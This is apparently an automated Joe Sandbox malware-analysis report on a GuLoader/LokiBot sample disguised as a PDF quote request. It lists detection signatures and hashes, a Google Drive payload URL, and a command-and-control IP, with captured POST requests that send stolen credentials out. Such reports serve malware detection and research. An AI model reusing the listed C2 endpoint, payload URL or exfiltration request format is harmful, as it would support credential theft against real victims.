Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report RFQ 001030112021#U00b7pdf.exe

Overview

General Information

Sample Name:RFQ 001030112021#U00b7pdf.exe
Analysis ID:531794
MD5:754fa9ff30ec6e1cd7a29837adeb7a8b
SHA1:09472c720424ab26d13b7dd8cc2e199a826a88d1
SHA256:957ac63b9471fe11ba63a0bca4759741b305525ef1c4a2e4be262ed4464a2935
Infos:

Most interesting Screenshot:

Detection

GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Potential malicious icon found
Multi AV Scanner detection for submitted file
GuLoader behavior detected
Multi AV Scanner detection for domain / URL
Yara detected GuLoader
Hides threads from debuggers
Tries to steal Mail credentials (via file / registry access)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to detect Any.run
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
C2 URLs / IPs found in malware configuration
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
IP address seen in connection with other malware
Abnormal high CPU Usage
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
PE / OLE file has an invalid certificate
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "https://drive.google.com/uc?export=download&id=1f5uP"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
    00000008.00000000.770261395.0000000000560000.00000040.00000001.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security

      Sigma Overview

      No Sigma rule has matched

      Jbx Signature Overview

      Click to jump to signature section

      Show All Signature Results

      AV Detection:

      barindex
      Found malware configurationShow sources
      Source: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmpMalware Configuration Extractor: GuLoader {"Payload URL": "https://drive.google.com/uc?export=download&id=1f5uP"}
      Multi AV Scanner detection for submitted fileShow sources
      Source: RFQ 001030112021#U00b7pdf.exeMetadefender: Detection: 17%Perma Link
      Source: RFQ 001030112021#U00b7pdf.exeReversingLabs: Detection: 17%
      Multi AV Scanner detection for domain / URLShow sources
      Source: http://63.250.34.171/tickets.php?id=277Virustotal: Detection: 8%Perma Link
      Source: 0.2.RFQ 001030112021#U00b7pdf.exe.400000.0.unpackAvira: Label: TR/Dropper.VB.Gen
      Source: 0.0.RFQ 001030112021#U00b7pdf.exe.400000.0.unpackAvira: Label: TR/Dropper.VB.Gen
      Source: 8.0.RFQ 001030112021#U00b7pdf.exe.400000.0.unpackAvira: Label: TR/Dropper.VB.Gen
      Source: 8.0.RFQ 001030112021#U00b7pdf.exe.400000.2.unpackAvira: Label: TR/Dropper.VB.Gen
      Source: 8.0.RFQ 001030112021#U00b7pdf.exe.400000.1.unpackAvira: Label: TR/Dropper.VB.Gen
      Source: 8.0.RFQ 001030112021#U00b7pdf.exe.400000.3.unpackAvira: Label: TR/Dropper.VB.Gen
      Source: RFQ 001030112021#U00b7pdf.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
      Source: unknownHTTPS traffic detected: 142.250.180.110:443 -> 192.168.2.4:49792 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 216.58.198.33:443 -> 192.168.2.4:49796 version: TLS 1.2

      Networking:

      barindex
      Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
      Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.4:49805 -> 63.250.34.171:80
      Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49805 -> 63.250.34.171:80
      Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49805 -> 63.250.34.171:80
      Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.4:49805 -> 63.250.34.171:80
      Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.4:49824 -> 63.250.34.171:80
      Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49824 -> 63.250.34.171:80
      Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49824 -> 63.250.34.171:80
      Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.4:49824 -> 63.250.34.171:80
      Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49825 -> 63.250.34.171:80
      Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49825 -> 63.250.34.171:80
      Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49825 -> 63.250.34.171:80
      Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49825 -> 63.250.34.171:80
      C2 URLs / IPs found in malware configurationShow sources
      Source: Malware configuration extractorURLs: https://drive.google.com/uc?export=download&id=1f5uP
      Source: Joe Sandbox ViewASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS
      Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
      Source: Joe Sandbox ViewIP Address: 63.250.34.171 63.250.34.171
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1f5uP5o0CfHZv_GAVqkAqahPOSxgGlgCb HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cacheCookie: CONSENT=YES+GB.en-GB+V9+BX
      Source: global trafficHTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/tmgkbuuoqg7e2eb3u8b2c66mt8m0nijc/1638356250000/03026244708369606156/*/1f5uP5o0CfHZv_GAVqkAqahPOSxgGlgCb?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-00-50-docs.googleusercontent.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: POST /tickets.php?id=277 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 63.250.34.171Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AA495C78Content-Length: 190Connection: close
      Source: global trafficHTTP traffic detected: POST /tickets.php?id=277 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 63.250.34.171Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AA495C78Content-Length: 190Connection: close
      Source: global trafficHTTP traffic detected: POST /tickets.php?id=277 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 63.250.34.171Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AA495C78Content-Length: 163Connection: close
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
      Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 01 Dec 2021 10:57:40 GMTServer: Apache/2.4.38 (Debian)Content-Length: 287Connection: closeContent-Type: text/html; charset=UTF-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0d 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 0d 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 33 38 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 36 33 2e 32 35 30 2e 33 34 2e 31 37 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><hr><address>Apache/2.4.38 (Debian) Server at 63.250.34.171 Port 80</address></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 01 Dec 2021 10:57:48 GMTServer: Apache/2.4.38 (Debian)Content-Length: 287Connection: closeContent-Type: text/html; charset=UTF-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0d 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 0d 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 33 38 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 36 33 2e 32 35 30 2e 33 34 2e 31 37 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><hr><address>Apache/2.4.38 (Debian) Server at 63.250.34.171 Port 80</address></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 01 Dec 2021 10:57:52 GMTServer: Apache/2.4.38 (Debian)Content-Length: 287Connection: closeContent-Type: text/html; charset=UTF-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0d 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 0d 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 33 38 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 36 33 2e 32 35 30 2e 33 34 2e 31 37 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><hr><address>Apache/2.4.38 (Debian) Server at 63.250.34.171 Port 80</address></body></html>
      Source: unknownTCP traffic detected without corresponding DNS query: 63.250.34.171
      Source: unknownTCP traffic detected without corresponding DNS query: 63.250.34.171
      Source: unknownTCP traffic detected without corresponding DNS query: 63.250.34.171
      Source: unknownTCP traffic detected without corresponding DNS query: 63.250.34.171
      Source: unknownTCP traffic detected without corresponding DNS query: 63.250.34.171
      Source: unknownTCP traffic detected without corresponding DNS query: 63.250.34.171
      Source: unknownTCP traffic detected without corresponding DNS query: 63.250.34.171
      Source: unknownTCP traffic detected without corresponding DNS query: 63.250.34.171
      Source: unknownTCP traffic detected without corresponding DNS query: 63.250.34.171
      Source: unknownTCP traffic detected without corresponding DNS query: 63.250.34.171
      Source: unknownTCP traffic detected without corresponding DNS query: 63.250.34.171
      Source: unknownTCP traffic detected without corresponding DNS query: 63.250.34.171
      Source: unknownTCP traffic detected without corresponding DNS query: 63.250.34.171
      Source: unknownTCP traffic detected without corresponding DNS query: 63.250.34.171
      Source: unknownTCP traffic detected without corresponding DNS query: 63.250.34.171
      Source: unknownTCP traffic detected without corresponding DNS query: 63.250.34.171
      Source: unknownTCP traffic detected without corresponding DNS query: 63.250.34.171
      Source: unknownTCP traffic detected without corresponding DNS query: 63.250.34.171
      Source: RFQ 001030112021#U00b7pdf.exe, 00000008.00000002.892182668.00000000009F2000.00000004.00000020.sdmp, RFQ 001030112021#U00b7pdf.exe, 00000008.00000002.895501429.000000001E743000.00000004.00000001.sdmpString found in binary or memory: http://63.250.34.171/tickets.php?id=277
      Source: RFQ 001030112021#U00b7pdf.exe, 00000008.00000002.892182668.00000000009F2000.00000004.00000020.sdmp, RFQ 001030112021#U00b7pdf.exe, 00000008.00000002.895501429.000000001E743000.00000004.00000001.sdmpString found in binary or memory: http://63.250.34.171/tickets.php?id=277N
      Source: RFQ 001030112021#U00b7pdf.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
      Source: RFQ 001030112021#U00b7pdf.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
      Source: RFQ 001030112021#U00b7pdf.exe, 00000008.00000002.892182668.00000000009F2000.00000004.00000020.sdmp, RFQ 001030112021#U00b7pdf.exe, 00000008.00000003.857252328.00000000009F2000.00000004.00000001.sdmp, RFQ 001030112021#U00b7pdf.exe, 00000008.00000003.858257850.00000000009F2000.00000004.00000001.sdmp, RFQ 001030112021#U00b7pdf.exe, 00000008.00000002.895501429.000000001E743000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
      Source: RFQ 001030112021#U00b7pdf.exeString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
      Source: RFQ 001030112021#U00b7pdf.exeString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
      Source: RFQ 001030112021#U00b7pdf.exeString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
      Source: RFQ 001030112021#U00b7pdf.exeString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
      Source: RFQ 001030112021#U00b7pdf.exeString found in binary or memory: http://ocsp.digicert.com0C
      Source: RFQ 001030112021#U00b7pdf.exeString found in binary or memory: http://ocsp.digicert.com0O
      Source: RFQ 001030112021#U00b7pdf.exeString found in binary or memory: http://www.digicert.com/CPS0
      Source: RFQ 001030112021#U00b7pdf.exe, 00000008.00000003.857252328.00000000009F2000.00000004.00000001.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/drive-explorer/
      Source: RFQ 001030112021#U00b7pdf.exe, 00000008.00000003.857252328.00000000009F2000.00000004.00000001.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/report-to/gse_l9ocaq
      Source: RFQ 001030112021#U00b7pdf.exe, 00000008.00000003.858257850.00000000009F2000.00000004.00000001.sdmpString found in binary or memory: https://doc-00-50-docs.googleusercontent.com/
      Source: RFQ 001030112021#U00b7pdf.exe, 00000008.00000002.892182668.00000000009F2000.00000004.00000020.sdmp, RFQ 001030112021#U00b7pdf.exe, 00000008.00000003.858257850.00000000009F2000.00000004.00000001.sdmp, RFQ 001030112021#U00b7pdf.exe, 00000008.00000002.895501429.000000001E743000.00000004.00000001.sdmpString found in binary or memory: https://doc-00-50-docs.googleusercontent.com/)
      Source: RFQ 001030112021#U00b7pdf.exe, 00000008.00000002.892182668.00000000009F2000.00000004.00000020.sdmp, RFQ 001030112021#U00b7pdf.exe, 00000008.00000003.858257850.00000000009F2000.00000004.00000001.sdmp, RFQ 001030112021#U00b7pdf.exe, 00000008.00000002.895501429.000000001E743000.00000004.00000001.sdmpString found in binary or memory: https://doc-00-50-docs.googleusercontent.com/:
      Source: RFQ 001030112021#U00b7pdf.exe, 00000008.00000003.858257850.00000000009F2000.00000004.00000001.sdmp, RFQ 001030112021#U00b7pdf.exe, 00000008.00000003.857244757.00000000009EB000.00000004.00000001.sdmp, RFQ 001030112021#U00b7pdf.exe, 00000008.00000002.895501429.000000001E743000.00000004.00000001.sdmpString found in binary or memory: https://doc-00-50-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/tmgkbuuo
      Source: RFQ 001030112021#U00b7pdf.exe, 00000008.00000003.857351180.0000000000A33000.00000004.00000001.sdmp, RFQ 001030112021#U00b7pdf.exe, 00000008.00000003.857252328.00000000009F2000.00000004.00000001.sdmp, RFQ 001030112021#U00b7pdf.exe, 00000008.00000003.858257850.00000000009F2000.00000004.00000001.sdmpString found in binary or memory: https://doc-00-50-docs.googleusercontent.com/p
      Source: RFQ 001030112021#U00b7pdf.exe, 00000008.00000003.857351180.0000000000A33000.00000004.00000001.sdmp, RFQ 001030112021#U00b7pdf.exe, 00000008.00000003.857252328.00000000009F2000.00000004.00000001.sdmp, RFQ 001030112021#U00b7pdf.exe, 00000008.00000003.858257850.00000000009F2000.00000004.00000001.sdmpString found in binary or memory: https://doc-00-50-docs.googleusercontent.com/t
      Source: RFQ 001030112021#U00b7pdf.exe, 00000008.00000002.895453741.000000001E6F8000.00000004.00000001.sdmp, RFQ 001030112021#U00b7pdf.exe, 00000008.00000002.892121972.0000000000987000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/
      Source: RFQ 001030112021#U00b7pdf.exe, 00000008.00000002.892261911.0000000002420000.00000004.00000001.sdmp, RFQ 001030112021#U00b7pdf.exe, 00000008.00000003.857252328.00000000009F2000.00000004.00000001.sdmp, RFQ 001030112021#U00b7pdf.exe, 00000008.00000002.892121972.0000000000987000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1f5uP5o0CfHZv_GAVqkAqahPOSxgGlgCb
      Source: RFQ 001030112021#U00b7pdf.exe, 00000008.00000002.895453741.000000001E6F8000.00000004.00000001.sdmp, RFQ 001030112021#U00b7pdf.exe, 00000008.00000002.892121972.0000000000987000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1f5uP5o0CfHZv_GAVqkAqahPOSxgGlgCbJ
      Source: RFQ 001030112021#U00b7pdf.exeString found in binary or memory: https://www.digicert.com/CPS0
      Source: unknownHTTP traffic detected: POST /tickets.php?id=277 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 63.250.34.171Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AA495C78Content-Length: 190Connection: close
      Source: unknownDNS traffic detected: queries for: drive.google.com
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1f5uP5o0CfHZv_GAVqkAqahPOSxgGlgCb HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cacheCookie: CONSENT=YES+GB.en-GB+V9+BX
      Source: global trafficHTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/tmgkbuuoqg7e2eb3u8b2c66mt8m0nijc/1638356250000/03026244708369606156/*/1f5uP5o0CfHZv_GAVqkAqahPOSxgGlgCb?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-00-50-docs.googleusercontent.comConnection: Keep-Alive
      Source: unknownHTTPS traffic detected: 142.250.180.110:443 -> 192.168.2.4:49792 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 216.58.198.33:443 -> 192.168.2.4:49796 version: TLS 1.2

      System Summary:

      barindex
      Potential malicious icon foundShow sources
      Source: initial sampleIcon embedded in PE file: bad icon match: 20047c7c70f0e004
      Source: RFQ 001030112021#U00b7pdf.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_0040131C0_2_0040131C
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B27250_2_020B2725
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B94050_2_020B9405
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B1A150_2_020B1A15
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020BEA590_2_020BEA59
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020BEF410_2_020BEF41
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B82090_2_020B8209
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B82150_2_020B8215
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B82210_2_020B8221
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B826D0_2_020B826D
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B82790_2_020B8279
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B82850_2_020B8285
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B82ED0_2_020B82ED
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B82F90_2_020B82F9
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B83080_2_020B8308
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B83690_2_020B8369
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B83E10_2_020B83E1
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B70090_2_020B7009
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B70150_2_020B7015
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B70210_2_020B7021
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B80310_2_020B8031
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B80860_2_020B8086
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B809D0_2_020B809D
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020BA09D0_2_020BA09D
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B80910_2_020B8091
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B70950_2_020B7095
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B80A90_2_020B80A9
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020BA0B50_2_020BA0B5
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020BD0C60_2_020BD0C6
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B70FD0_2_020B70FD
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B70F10_2_020B70F1
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B71030_2_020B7103
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B81050_2_020B8105
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020BA1190_2_020BA119
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B811D0_2_020B811D
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B81110_2_020B8111
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B81290_2_020B8129
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020BA1280_2_020BA128
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B712C0_2_020B712C
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B713D0_2_020B713D
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B71490_2_020B7149
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B71620_2_020B7162
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B81B90_2_020B81B9
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B81C50_2_020B81C5
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B81DD0_2_020B81DD
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B71DC0_2_020B71DC
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B81D10_2_020B81D1
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B81F80_2_020B81F8
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B86090_2_020B8609
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B760D0_2_020B760D
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B76190_2_020B7619
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B86150_2_020B8615
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B862D0_2_020B862D
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B86210_2_020B8621
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B76250_2_020B7625
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B76310_2_020B7631
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B76640_2_020B7664
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B76B90_2_020B76B9
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B76C50_2_020B76C5
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B76DD0_2_020B76DD
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B76D10_2_020B76D1
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B86FC0_2_020B86FC
